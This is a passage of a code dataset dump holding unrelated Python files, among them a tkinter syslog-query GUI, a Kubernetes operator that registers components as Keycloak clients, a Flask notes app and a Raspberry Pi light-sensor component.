MaterialProperty(self.name,self.color,self.thickness,self.E1,self.E2,self.density,self.poisson,self.is_adhesive,self.is_rigid,self.is_conductive,self.is_flexible)\n @classmethod\n def make_n_blank(cls,n,thickness = 1,E1 = 1,E2 = 1,density = 1, poisson = 1,is_adhesive = False, is_rigid = False, is_conductive = False, is_flexible = False ):\n import numpy\n import matplotlib.cm\n cm = matplotlib.cm.plasma\n colors = numpy.array([cm(ii/(n-1)) for ii in range(n)])\n colors[:,3] = .25\n colors = [tuple(item) for item in colors] \n materials = []\n for ii,color in enumerate(colors):\n materials.append(cls('layer'+str(ii),color,thickness,E1,E2,density,poisson,is_adhesive,is_rigid,is_conductive,is_flexible))\n return materials\n \nclass JointProps(object):\n def __init__(self,stiffness,damping,preload,limit_neg,limit_pos,z_pos):\n self.stiffness = stiffness\n self.damping = damping\n self.preload = preload\n self.limit_neg = limit_neg\n self.limit_pos = limit_pos\n self.z_pos = z_pos\n\nclass DynamicsInfo(object):\n def __init__(self,connected_items,connections,newtonian_ids,material_properties):\n self.connected_items = connected_items\n self.connections = connections\n self.newtonian_ids = newtonian_ids\n self.material_properties = material_properties\n \n\nif __name__=='__main__':\n import yaml\n d = DynamicsInfo(1,2,3,4)\n with open('asdf.yaml','w') as f:\n yaml.dump(d,f)\n \n ","sub_path":"python/foldable_robotics/dynamics_info.py","file_name":"dynamics_info.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"291510257","text":"#!/usr/bin/env python\nfrom distutils.core import setup\n\nversion_tuple = __import__('pygvm').VERSION\nversion = \".\".join([str(v) for v in version_tuple])\n\nsetup(\n name='pygvm',\n description='''Simplified port of GVM for python. See http://www.tomgibara.com/clustering/fast-spatial/java-library for the original.''',\n version=version,\n author='Craig de Stigter',\n author_email='craig.ds@gmail.com',\n url='http://github.com/craigds/pygvm',\n packages=['pygvm', 'pygvm.libs'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"202269123","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Importation des bibliothèques tkinter pour le codage de l'interface graphique, datetime pour l'horodatage et re pour les expressions régulières\nimport datetime, re\nfrom tkinter import *\nfrom tkinter.messagebox import *\n\nclass Interface(Frame):\n\n\tdef __init__(self, master):\n\t\tFrame.__init__(self, master)\n\t\t\n\t\t\n\t\t# Label de présentation\n\t\tpresentation = Label(master, text=\"Bienvenue! \\n\\nCet utilitaire a pour but de détecter les postes branchés sur un réseau, ainsi que de récupérer les différents logs des sessions d'utilisateur. \\nPour l'utiliser, saisissez une date dans la première zone de texte, puis une heure dans la seconde et cliquez sur 'Valider' pour lancer la recherche. \\n\\nPar défaut, la période sélectionnée se situera entre votre saisie et l'instant présent. \\nSi vous le souhaitez, vous pouvez définir la fin de la période à scanner.\", fg = \"green\", bg = \"white\").grid(row = 0, column = 1, columnspan = 2)\n\t\t\n\t\t# Label n°1\n\t\tL1 = Label(master, text = \"Début de la période (date):\", bg = \"white\").grid(row = 1, column = 1)\n\t\t\n\t\t# Zone de saisie n°1 (date)\n\t\tcontent1 = StringVar()\n\t\tcontent1.set(\"AAAA-MM-JJ\")\n\t\t\n\t\tZ1 = Entry(master)\n\t\tZ1.grid(row = 1, column = 2)\n\t\tZ1[\"text\"] = content1\n\t\t\n\t\t\n\t\t# Label n°2\n\t\tL2 = Label(master, text = \"Début de la période (heure):\", bg = \"white\").grid(row = 2, column = 1)\n\t\t\n\t\t# Zone de saisie n°2 (heure)\n\t\tcontent2 = StringVar()\n\t\tcontent2.set(\"HH:MM\")\n\t\t\n\t\tZ2 = Entry(master)\n\t\tZ2.grid(row = 2, column = 2)\n\t\tZ2[\"text\"] = content2\n\t\t\n\t\t\n\t\t# Label n°3\n\t\tL3 = Label(master, text = \"Fin de la période (date):\", bg = \"white\").grid(row = 3, column = 1)\n\t\t\n\t\t# Zone de saisie n°3 (date)\n\t\tcontent3 = StringVar()\n\t\tcontent3.set(datetime.datetime.now().strftime('%Y-%m-%d'))\n\t\t\n\t\tZ3 = Entry(master)\n\t\tZ3.grid(row = 3, column = 2)\n\t\tZ3[\"text\"] = content3\n\t\t\n\t\t\n\t\t# Label n°4\n\t\tL4 = Label(master, text = \"Fin de la période (heure):\", bg = \"white\").grid(row = 4, column = 1)\n\n\t\t# Zone de saisie n°4 (heure)\n\t\tcontent4 = StringVar()\n\t\tcontent4.set(datetime.datetime.now().strftime(\"%H:%M\"))\n\t\t\n\t\tZ4 = Entry(master)\n\t\tZ4.grid(row = 4, column = 2)\n\t\tZ4[\"text\"] = content4\n\n\n\t\t# Affichage des questions/réponses\n\t\tdef Faq():\n\t\t\tshowinfo(\"FAQ\", \"Q: Quels sont les formats pour les paramètres à saisir?\\n\\nR: 'Année-Mois-Jour' pour les dates, 'Heure:Minutes' pour les heures; la ponctuation doit aussi être respectée.\\n\\t\\t\\t\\t\\t-------------\\n\\nQ: J'ai rentré mes paramètres, mais aucun résultat ne sort lorsque je valide.\\n\\nR: Le serveur syslog auquel l'application est connectée est soit inactif, soit mal configuré. Autrement, c'est parce qu'elle n'est connectée à aucun serveur.\")\n\n\t\t# Affichage des informations de la version de l'application\n\t\tdef Apropos():\n\t\t\tshowinfo(\"A propos\", \"Nom de l'application: Outil de lecture réseau\\n\\nLangage utilisé: Python 3\\n\\nDéveloppeur: Rémi Kajak\\n\\nAvancée du projet: 80%\")\n\n\t\t# Vérification des paramètres à envoyer au script\n\t\tdef Verifenvoi():\n\t\t\n\t\t\t# Attribution des matchers de chaque content à des variables\n\t\t\tC1 = re.match(\"([0-9]{4})\\-([0-1][0-9])\\-([0-3][0-9])\", content1.get())\n\t\t\tC2 = re.match(\"([0-2]{0,1}[0-9])\\:([0-5][0-9])\", content2.get())\n\t\t\tC3 = re.match(\"([0-9]{4})\\-([0-1][0-9])\\-([0-3][0-9])\", content3.get())\n\t\t\tC4 = re.match(\"([0-2]{0,1}[0-9])\\:([0-5][0-9])\", content4.get())\n\t\t\n\t\t\t# Si au moins l'un des champs est vide\n\t\t\tif content1.get() == \"\" or content2.get() == \"\" or content3.get() == \"\" or content4.get() == \"\":\n\t\t\t\tshowwarning(\"Attention\", \"Un champ, au minimum, n'est pas rempli!\")\n\t\t\t\n\t\t\t# Si les deux premières saisies ne sont pas conformes aux formats attendus\n\t\t\telif C1 == None:\n\t\t\t\tshowwarning(\"Erreur\", \"La date de départ n'est pas correcte!\")\n\t\t\t\tcontent1.set(\"201A-MM-JJ\")\n\t\t\t\t\n\t\t\telif C2 == None:\n\t\t\t\tshowwarning(\"Erreur\", \"L'heure de départ n'est pas correcte!\")\n\t\t\t\tcontent2.set(\"HH:MM\")\n\t\t\t\n\t\t\t# Si les deux dernières saisies ne sont pas conformes aux formats attendus\n\t\t\telif C3 == None:\n\t\t\t\tshowwarning(\"Erreur\", \"La date de fin n'est pas correcte!\")\n\t\t\t\tcontent3.set(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n\t\t\t\n\t\t\telif C4 == None:\n\t\t\t\tshowwarning(\"Erreur\", \"L'heure de départ n'est pas correcte!\")\n\t\t\t\tcontent4.set(datetime.datetime.now().strftime(\"%H:%M\"))\n\t\t\t\n\t\t\t# Si la date du début de la période dépasse celle de la fin de la période\n\t\t\telif content1.get() > content3.get():\n\t\t\t\tshowwarning(\"Erreur\", \"La première date dépasse la seconde date!\")\n\t\t\t\n\t\t\t# Dans le cas où les dates sont les mêmes\n\t\t\telif content1.get() == content3.get():\n\t\t\t\t# Si l'heure du début de la période dépasse celle de la fin de la période\n\t\t\t\tif content2.get() > content4.get():\n\t\t\t\t\tshowwarning(\"Erreur\", \"La première heure dépasse la seconde heure!\")\n\t\t\t\t\n\t\t\t\t# Si l'heure du début de la période est égale à celle de la fin de la période\n\t\t\t\telif content2.get() == content4.get():\n\t\t\t\t\tshowwarning(\"Attention\", \"La période que vous souhaitez scanner commence et se termine sur le même jour et la même heure!\")\n\t\t\t\t\n\t\t\t\t# Comme le script rentre dans cette condition en cas d'erreur et n'en ressort pas, on itère l'envoi ici\n\t\t\t\telif content2.get() < content4.get():\n\t\t\t\t\t# Envoi des variables au script\n\t\t\t\t\tif (askyesno(\"Succès\", \"Les valeurs sont correctes. Confirmer ces paramètres?\") == 1):\n\t\t\t\t\t\t# Valeurs à envoyer vers script.py\n\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tshowinfo(\"Confirmation\", \"Les informations ont été envoyées.\")\n\n\t\t\t\t\t# Sinon, on réinitialise les valeurs des contents\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontent1.set(\"201A-MM-JJ\")\n\t\t\t\t\t\tcontent2.set(\"HH:MM\")\n\t\t\t\t\t\tcontent3.set(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n\t\t\t\t\t\tcontent4.set(datetime.datetime.now().strftime(\"%H:%M\"))\n\t\t\t\n\t\t\t# Toutes les conditions sont respectées.\n\t\t\telse:\n\t\t\t\t# Envoi des variables au script\n\t\t\t\tif (askyesno(\"Succès\", \"Les valeurs sont correctes. Confirmer ces paramètres?\") == 1):\n\t\t\t\t\t# Valeurs à envoyer vers script.py\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tshowinfo(\"Confirmation\", \"Les informations ont été envoyées.\")\n\n\t\t\t\t# Sinon, on réinitialise les valeurs des contents\n\t\t\t\telse:\n\t\t\t\t\tcontent1.set(\"201A-MM-JJ\")\n\t\t\t\t\tcontent2.set(\"HH:MM\")\n\t\t\t\t\tcontent3.set(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n\t\t\t\t\tcontent4.set(datetime.datetime.now().strftime(\"%H:%M\"))\n\t\t\n\t\t\n\t\t# Barre des onglets\n\t\tonglets_barre = Menu(master, bg = \"white\")\n\n\t\tonglet = Menu(onglets_barre, tearoff = 0)\n\t\tonglet.add_command(label = \"FAQ\", command = Faq)\n\t\tonglet.add_separator()\n\t\tonglet.add_command(label = \"A propos\", command = Apropos)\n\t\tonglets_barre.add_cascade(label = \"Aide\", menu = onglet)\n\t\t\n\t\tmaster.config(menu=onglets_barre)\n\n\t\t# Bouton \"Quitter\"\n\t\tbouton_quitter = Button(master, text = \"Quitter\", bg = \"white\", command = master.quit).grid(row = 5, column = 0)\n\n\t\t# Bouton \"Valider\"\n\t\tbouton_cliquer = Button(master, text = \"Valider\", bg = \"white\", command = Verifenvoi).grid(row = 5, column = 3)\n \t\n\n#Création de la fenêtre qui contiendra tous les composants graphiques\nfenetre_principale = Tk()\nfenetre = Interface(master = fenetre_principale)\n\nfenetre.master.title(\"Outil de lecture réseau\")\nfenetre.master.maxsize(1025, 240)\n\n# Afin que, lorsque le fichier est exécuté, la fenêtre puisse s'ouvrir\nfenetre.mainloop()\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"539290080","text":"#! /usr/bin/env python3\n#-*- coding: utf-8 -*-\n\nimport sqlite3\n\nclass Banco:\n def __init__(self):\n self.conexao = sqlite3.connect(\"banco\")\n \n def criar_tabela(self):\n self.conexao.execute(\"\"\"CREATE TABLE IF NOT EXISTS usuarios(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n nome TEXT,\n sobrenome TEXT,\n endereco TEXT\n );\n \"\"\")\n print(\"criado!\")\n\nBanco().criar_tabela()","sub_path":"introducao.py","file_name":"introducao.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"466114345","text":"'''\nA matrix is Toeplitz if every diagonal from top-left to bottom-right has the same element.\n\nNow given an M x N matrix, return True if and only if the matrix is Toeplitz.\n\n\nInput:\nmatrix = [\n [1,2,3,4],\n [5,1,2,3],\n [9,5,1,2]\n]\nOutput: True\n\n'''\n\n\ndef solution(m):\n for i in range(len(m) - 1):\n for j in range(len(m[0]) - 1):\n if m[i][j] != m[i + 1][j + 1]:\n return False\n return True\n\nmatrix = [\n [1,2,3,4],\n [5,1,2,3],\n [9,5,1,2]\n]\nprint(solution(matrix))","sub_path":"Easy/ Toeplitz_Matrix.py","file_name":" Toeplitz_Matrix.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"519187020","text":"import kopf\nimport logging\nimport os\nimport requests\nimport uuid\nimport datetime\nimport secconkeycloak\n\nfrom cloudevents.http import CloudEvent, to_structured\n\n# Helper functions ----------\n\n#def getToken(user: str, pwd: str) -> str:\n# \"\"\"\n# Takes the admin username and password and returns a session token for future Bearer authentication\n#\n# Returns the token, or raises an exception for the caller to catch\n# \"\"\"\n#\n# try: # to get the token from Keycloak\n# r = requests.post(kcBaseURL + '/realms/master/protocol/openid-connect/token', data = {\"username\": user, \"password\": pwd, \"grant_type\": \"password\", \"client_id\": \"admin-cli\"})\n# r.raise_for_status()\n# return r.json()[\"access_token\"]\n# except requests.HTTPError as e:\n# raise\n\n#def createClient(client: str, url: str, token: str, realm: str) -> None:\n# \"\"\"\n# POSTs a new client named according to the componentName for a new component\n#\n# Returns nothing, or raises an exception for the caller to catch\n# \"\"\"\n#\n# try: # to create the client in Keycloak\n# r = requests.post(kcBaseURL + '/admin/realms/'+ realm +'/clients', json={\"clientId\": client, \"rootUrl\": url}, headers={'Authorization': 'Bearer ' + token})\n# r.raise_for_status()\n# except requests.HTTPError as e:\n# # ! This might hide actual errors\n# # ! The keycloak API isn't idempotent.\n# # ! If a client exists it returns 409 instead of 201\n# # ! But why did we call createClient for a client that exists?\n# if e.response.status_code == 409:\n# pass # because the client (already) exists, which is what we want\n# else:\n# raise\n\n#def delClient(client: str, token: str, realm: str) -> bool:\n# \"\"\"\n# DELETEs a client\n#\n# Returns nothing, or raises an exception for the caller to catch\n# \"\"\"\n#\n# try: # to GET the id of the existing client that we need to DELETE it\n# r_a = requests.get(kcBaseURL + '/admin/realms/'+ realm +'/clients', params={\"clientId\": client}, headers={'Authorization': 'Bearer ' + token})\n# r_a.raise_for_status()\n# except requests.HTTPError as e:\n# logger.error(formatCloudEvent(str(e), f\"secCon couldn't GET ID for client {client} in realm {realm}\"))\n# raise\n#\n# if len(r_a.json()) > 0: # we found a client with a matching name\n# targetClient = r_a.json()[0]['id']\n#\n# try: # to delete the client matching the id we found\n# r_b = requests.delete(kcBaseURL + '/admin/realms/'+ realm +'/clients/' + targetClient, headers={'Authorization': 'Bearer ' + token})\n# r_b.raise_for_status()\n# except requests.HTTPError as e:\n# logger.error(formatCloudEvent(str(e), f\"secCon couldn't DELETE client {client} in realm {realm}\"))\n# raise\n#\n# else: # we didn't find a client with a matching name\n# # ! This might hide actual errors\n# # ! if the client doesn't exist the API call returns an empty JSON array\n# # ! But why did we call delClient for a client that didn't exist?\n# pass # because the client doesn't exist, which is what we want\n \ndef registerListener(url: str) -> None:\n \"\"\"\n Register the listener URL with partyRoleManagement for role updates\n\n Returns nothing, or raises an exception for the caller to catch\n \"\"\"\n\n try: # to register the listener\n r = requests.post(url, json = {\"callback\": \"http://seccon.canvas:5000/listener\"})\n r.raise_for_status()\n except requests.HTTPError as e:\n raise\n\ndef formatCloudEvent(message: str, subject: str) -> str:\n \"\"\"\n Returns a correctly formatted CloudEvents compliant event\n \"\"\"\n attributes = {\n \"specversion\" : \"1.0\",\n \"type\" : \"org.tmforum.for.type.event.an.invented.burton.brian\",\n \"source\" : \"http://seccon.canvas.svc.cluster.local\",\n \"subject\": subject,\n \"id\" : str(uuid.uuid4()),\n \"time\" : datetime.datetime.now().isoformat(),\n \"datacontenttype\" : \"application/json\",\n }\n\n data = {\"message\": message}\n\n event = CloudEvent(attributes, data)\n headers, body = to_structured(event)\n\n return body\n\n# Script setup --------------\nlogging_level = os.environ.get('LOGGING', logging.INFO)\nprint('Logging set to ', logging_level)\nlogger = logging.getLogger('SecurityOperator')\nlogger.setLevel(int(logging_level))\n\nusername = os.environ.get('KEYCLOAK_USER')\npassword = os.environ.get('KEYCLOAK_PASSWORD')\nkcBaseURL = os.environ.get('KEYCLOAK_BASE')\nkcRealm = os.environ.get('KEYCLOAK_REALM')\n\nkc = secconkeycloak.Keycloak(kcBaseURL)\n\n\n# Kopf handlers -------------\n\n\n# @kopf.on.resume('oda.tmforum.org', 'v1alpha2', 'components')\n@kopf.on.update('oda.tmforum.org', 'v1alpha2', 'components', field='status.deployment_status', value='Complete') # called by kopf framework when a component's status is updated\ndef securityClientAdd(meta, spec, status, body, namespace, labels, name, old, new, **kwargs):\n \"\"\"\n Handler for component create/update\n \"\"\"\n\n rooturl = 'http://' + spec['security']['partyrole']['implementation'] + '.' + namespace + '.svc.cluster.local:' + str(spec['security']['partyrole']['port']) + spec['security']['partyrole']['path']\n logger.debug(f\"using component root url: {rooturl}\")\n logger.debug(f'status.deployment_status = {old} -> {new}')\n\n try: # to authenticate and get a token\n token = kc.getToken(username, password)\n except requests.HTTPError as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't GET Keycloak token\"))\n except requests.URLRequired as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't determine Keycloak URL\"))\n raise kopf.PermanentError(\"Could not determine Keycloak URL. Will NOT retry.\")\n\n try: # to create the client in Keycloak\n kc.createClient(name, rooturl, token, kcRealm)\n except requests.HTTPError as e:\n logger.error(formatCloudEvent(str(e), f\"secCon couldn't POST new client {name} in realm {kcRealm}\"))\n raise kopf.TemporaryError(\"Could not add component to Keycloak. Will retry.\", delay=10)\n except requests.URLRequired as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't determine Keycloak URL\"))\n raise kopf.PermanentError(\"Could not determine Keycloak URL. Will NOT retry.\")\n else:\n logger.info(formatCloudEvent(f\"oda.tmforum.org component {name} created\", f\"secCon: component created\"))\n try: # to register with the partyRoleManagement API\n registerListener(rooturl + \"/hub\")\n except requests.HTTPError as e:\n logger.warning(formatCloudEvent(str(e), \"secCon couldn't register partyRoleManagement listener\"))\n statusValue = {'identityProvider': 'Keycloak', 'listenerRegistered': False}\n raise kopf.TemporaryError(\"Could not register listener. Will retry.\", delay=10)\n else:\n statusValue = {'identityProvider': 'Keycloak', 'listenerRegistered': True}\n \n return statusValue # the return value is added to the status field of the k8s object under securityRoles parameter (corresponds to function name)\n \n\n@kopf.on.delete('oda.tmforum.org', 'v1alpha2', 'components', retries=5) # called by kopf framework when a component is deleted\ndef securityClientDelete(meta, spec, status, body, namespace, labels, name, **kwargs):\n \"\"\"\n Handler to delete component from Keycloak\n \"\"\"\n\n try: # to authenticate and get a token\n token = kc.getToken(username, password)\n except requests.HTTPError as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't GET Keycloak token\"))\n except requests.URLRequired as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't determine Keycloak URL\"))\n raise kopf.PermanentError(\"Could not determine Keycloak URL. Will NOT retry.\")\n\n try: # to delete the client from Keycloak\n kc.delClient(name, token, kcRealm)\n except requests.HTTPError as e:\n logger.error(formatCloudEvent(str(e), f\"secCon couldn't DELETE client {name} in realm {kcRealm}\"))\n raise kopf.TemporaryError(\"Could not delete component from Keycloak. Will retry.\", delay=10)\n except requests.URLRequired as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't determine Keycloak URL\"))\n raise kopf.PermanentError(\"Could not determine Keycloak URL. Will NOT retry.\")","sub_path":"controllers/securityController/securityControllerKeycloak.py","file_name":"securityControllerKeycloak.py","file_ext":"py","file_size_in_byte":8412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"453132820","text":"#!/usr/bin/env python2.7\n\nimport sys\nimport math\n\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nfrom igraph import Clustering, compare_communities\nimport numpy as np\n\nfrom read_sim_data import *\n\n\ndef get_plot_data(i, time_intervals):\n t = time_intervals[i]\n ground_truth = Clustering([n.group for n in t.nodes])\n cc = Clustering([n.cc for n in t.nodes])\n return compare_communities(ground_truth, cc, method = \"danon\")\n\n\ndef plot(time_intervals):\n x = [t.end for t in time_intervals]\n data = [get_plot_data(i, time_intervals) for i in range(len(time_intervals))]\n line, = plt.plot(x, data, '-o')\n average = sum(data) / len(data)\n plt.ylim(0, 1.1)\n plt.title(\"Average clustering: \" + str(average))\n plt.show()\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n print(argv[1])\n plot(read_file(argv[1]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scenarios/scripts/old_scripts/ground_truth_plot.py","file_name":"ground_truth_plot.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"220273025","text":"# coding=utf8\n#\n\n\nfrom unidecode import unidecode\nfrom django.template.defaultfilters import slugify\n\n\ndef test_slugify():\n value = unicode(unidecode(u\"中文\"))\n assert slugify(value) == \"zhong-wen\"\n print(\"Test Slugify Done\")\n\n\nif __name__ == '__main__':\n test_slugify()","sub_path":"redotc/tests/utils/test_slugify.py","file_name":"test_slugify.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"449550707","text":"from element import *\nimport numpy as np\n\n\nclass CreateBank(Element):\n def __init__(self, delay):\n super().__init__(name_element=None, delay=delay)\n self.priority = []\n\n def out_act(self):\n super().out_act()\n self.t_next[0] = self.t_curr + super().get_delay()\n next_queue = list()\n for i in range(len(self.next_element)):\n next_queue.append(self.next_element[i].queue)\n if len(self.priority) > 0:\n if max(next_queue) == 0:\n self.priority[0].in_act()\n elif len(self.probability) > 1:\n next_el = np.random.choice(a=self.next_element, p=self.probability)\n next_el.in_act()\n elif len(self.probability) == 1:\n way_id = next_queue.index(min(next_queue))\n self.next_element[way_id].in_act()\n elif len(self.priority) == 0 and len(self.probability) >= 1:\n next_el = np.random.choice(a=self.next_element, p=self.probability)\n next_el.in_act()\n\n @property\n def priority(self):\n return self.__priority\n\n @priority.setter\n def priority(self, value):\n self.__priority = value\n","sub_path":"Lab 4 - Universal algorhitm/create_bank.py","file_name":"create_bank.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"573218816","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom operator import or_\nfrom DB import Notes, db\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n myNotes = Notes.query.order_by(Notes.create_at.desc()).all()\n readNote = Notes.query.order_by(Notes.create_at.desc()).first()\n return render_template('items/notes.html', notes=myNotes, read=readNote)\n\n@app.route('/read/')\ndef read(id):\n readNote = Notes.query.get(id)\n myNotes = Notes.query.order_by(Notes.create_at.desc()).all()\n return render_template('items/notes.html', notes=myNotes, read=readNote)\n\n@app.route('/add')\ndef add():\n myNotes = Notes.query.order_by(Notes.create_at.desc()).all()\n return render_template('items/add.html', notes=myNotes)\n\n@app.route('/remove/')\ndef remove(id):\n myNote = Notes.query.get(id)\n db.session.delete(myNote)\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/edit/')\ndef edit(id):\n myNote = Notes.query.get(id)\n myNotes = Notes.query.order_by(Notes.create_at.desc()).all()\n return render_template('items/edit.html', notes=myNotes, read=myNote)\n\n@app.route('/editForm', methods=['POST'])\ndef editForm():\n id = request.form['id']\n title = request.form['title']\n contain = request.form['contain']\n myNote = Notes.query.get(id)\n # Update\n myNote.title = title\n myNote.contain = contain\n myNote.update_at = datetime.now()\n db.session.commit()\n\n return redirect(url_for('index'))\n\n@app.route('/addForm', methods=['POST'])\ndef addForm():\n title = request.form['title']\n contain = request.form['contain']\n myNote = Notes(title, contain)\n db.session.add(myNote)\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/search', methods=['GET'])\ndef search():\n q = ''\n read = None\n if request.args.get('q'):\n q = request.args.get('q')\n myNotes = Notes.query.filter(or_(\n Notes.title.like('%{0}%'.format(q)),\n Notes.contain.like('%{0}%'.format(q)))).order_by(\n Notes.create_at.desc()).all()\n if myNotes:\n read = myNotes[0]\n return render_template('items/notes.html', notes=myNotes, read=read)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"Papernote.py","file_name":"Papernote.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"280565320","text":"import tensorflow as tf\nimport os\nfrom model import MODEL\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_boolean(\"is_train\", True, \"if the train\")\nflags.DEFINE_boolean(\"is_eval\", False, \"if the eval\")\nflags.DEFINE_string(\"model_dir\", 'Model', \"the dir of model\")\nflags.DEFINE_string(\"checkpoint_dir\", '20181120', \"the checkpoint of model\")\n\nflags.DEFINE_integer(\"block_x2\", 4, \"the num of 64block\")\nflags.DEFINE_integer(\"block_x3\", 4, \"the num of 96block\")\nflags.DEFINE_integer(\"block_x4\", 4, \"the num of 128block\")\n\nflags.DEFINE_float(\"learning_rate\", 0.01, \"the learning rate\") ###################\nflags.DEFINE_integer(\"image_size\", 32, \"the size of image input\")\nflags.DEFINE_integer(\"batch_size\", 64, \"the size of batch\")\nflags.DEFINE_integer(\"kernel_size\", 3, \"the size of kernel\")\nflags.DEFINE_integer(\"out_channel\", 64, \"the channel of output\")\nflags.DEFINE_string(\"gpu_device\", '1', \"the number of gpu using\")\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = FLAGS.gpu_device\n\n\ndef main(_):\n model = MODEL(tf.Session(),\n is_train=FLAGS.is_train,\n is_eval=FLAGS.is_eval,\n image_size=FLAGS.image_size,\n batch_size=FLAGS.batch_size,\n kernel_size=FLAGS.kernel_size,\n out_channel=FLAGS.out_channel,\n block_x2=FLAGS.block_x2,\n block_x3=FLAGS.block_x3,\n block_x4=FLAGS.block_x4)\n if model.is_train:\n model.train(FLAGS)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"469209131","text":"#!/usr/bin/python\n\nfrom threading import current_thread\nimport threading\n\nfrom twisted.internet import reactor\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.internet.error import ReactorNotRunning\n\nfrom autobahn.util import utcnow\nfrom autobahn.twisted.util import sleep\nfrom autobahn.twisted.wamp import ApplicationSession, ApplicationRunner\nfrom autobahn.wamp.exception import ApplicationError\n\nimport RPi.GPIO as GPIO\n\nimport os\nimport argparse\n\nimport six\n\nimport txaio\ntxaio.use_twisted()\n\n# OK\ndef get_serial():\n \"\"\"\n Get the Pi's serial number.\n \"\"\"\n with open('/proc/cpuinfo') as fd:\n for line in fd.read().splitlines():\n line = line.strip()\n if line.startswith('Serial'):\n _, serial = line.split(':')\n return serial.strip().lstrip('0')\n\n# probably\ndef config_light_sensor_gpio(channel):\n \"\"\"\n configure the Light Sensor GPIO Pin\n \"\"\"\n\n GPIO.setmode(GPIO.BCM)\n\n # declare GPIO Pin as input and enable the pull-up resistor\n GPIO.setup(channel, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\nclass LightSensorComponent(ApplicationSession):\n \"\"\"Our component wrapping a light sensor which is threshold triggered.\"\"\"\n\n @inlineCallbacks\n def onJoin(self, details):\n self.log.info('Session joined on thread {thread_id}: {details}', thread_id=current_thread().ident, details=details)\n\n \"\"\"Callback when the WAMP session has been established and is ready for use.\"\"\"\n # get the Pi serial number\n self._serial = get_serial()\n\n # all procedures/events will have this URI prefix\n self._prefix = u'io.crossbar.demo.iotstarterkit.{}.temperature_alarm'.format(self._serial)\n\n # print startup infos\n self.log.info(\"Crossbar.io IoT Starterkit Serial No.: {serial}\", serial=self._serial)\n self.log.info(\"LightSensorComponent connected: {details}\", details=details)\n\n # get component user extra configuration\n cfg = self.config.extra\n\n # initialize temp sensor\n self._light_sensor_pin = cfg['light_sensor_pin']\n GPIO.setwarnings(False)\n config_light_sensor_gpio(self._light_sensor_pin)\n\n # # setup edge detection for the light sensor\n # GPIO.add_event_detect(self._light_sensor_pin, GPIO.RISING, callback=self.light_change, bouncetime=50)\n\n\n # simple polling for now\n self._is_hot = False\n\n def printit():\n threading.Timer(0.1, printit).start()\n # print \"Hello, World!\"\n if GPIO.input(self._light_sensor_pin):\n if not self._is_hot:\n self._is_hot = True\n self.publish(u'{}.is_hot'.format(self._prefix))\n print(\"input is HIGH\")\n else:\n if self._is_hot:\n self._is_hot = False\n self.publish(u'{}.is_cold'.format(self._prefix))\n print(\"input is LOW\")\n\n printit()\n\n # remember startup timestamp\n self._started = utcnow()\n\n # flag indicating if the button is already pressed\n self._is_dark = False\n\n # register procedures\n for proc in [\n (self.started, u'started'),\n (self._is_dark, u'is_dark'),\n ]:\n uri = u'{}.{}'.format(self._prefix, proc[1])\n yield self.register(proc[0], uri)\n self.log.info('registered procedure {uri}', uri=uri)\n\n self._is_ready = True\n self.log.info(\"LightSensorComponent ready!\")\n\n def started(self):\n \"\"\"\n Get UTC timestamp when the component started.\n\n :returns: ISO8601 formatted UTC timestamp when the component started.\n :rtype: str\n \"\"\"\n return self._started\n\n def is_dark(self):\n \"\"\"\n Check if the buzzer is currently playing a beeping sequence, and hence a (further)\n concurrent call to beep() 